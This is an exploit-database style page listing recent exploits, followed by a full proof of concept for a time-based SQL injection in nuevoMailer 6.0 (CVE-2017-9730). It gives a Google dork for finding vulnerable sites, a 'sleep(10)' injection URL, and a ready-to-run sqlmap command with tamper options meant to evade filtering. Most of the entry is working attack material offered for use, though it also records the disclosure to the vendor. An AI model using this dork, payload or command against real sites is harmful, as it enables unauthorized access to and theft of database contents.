
13 new exploits GNU binutils - 'rx_decode_opcode' Buffer Overflow GNU binutils - 'disassemble_bytes' Heap Overflow GNU binutils - 'bfd_get_string' Stack Buffer Overflow GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow GNU binutils - 'ieee_object_p' Stack Buffer Overflow GNU binutils - 'print_insn_score16' Buffer Overflow GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow iBall Baton iB-WRA150N - Unauthenticated DNS Change nuevoMailer 6.0 - SQL Injection UTstarcom WA3002G4 - Unauthenticated DNS Change D-Link DSL-2640U - Unauthenticated DNS Change Beetel BCM96338 Router - Unauthenticated DNS Change D-Link DSL-2640B - Unauthenticated Remote DNS Change
27 lines
No EOL
1.1 KiB
Text
Executable file
27 lines
No EOL
1.1 KiB
Text
Executable file
# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection
|
||
# Exploit Author: ALEH BOITSAU
|
||
# Google Dork: inurl:/inc/rdr.php?
|
||
# Date: 2017-06-09
|
||
# Vendor Homepage: https://www.nuevomailer.com/
|
||
# Version: 6.0 and earlier
|
||
# Tested on: Linux
|
||
# CVE: CVE-2017-9730
|
||
|
||
Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier
|
||
allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
|
||
|
||
PoC:
|
||
|
||
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
|
||
|
||
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
|
||
|
||
sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4
|
||
|
||
NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time.
|
||
|
||
Disclosure Timeline:
|
||
2017-06-09: Vendor has been notified
|
||
2017-06-09: Vendor responded with intention to fix the vulnerability
|
||
2017-06-16: CVE number acquired
|
||
2017-06-16: Public disclosure |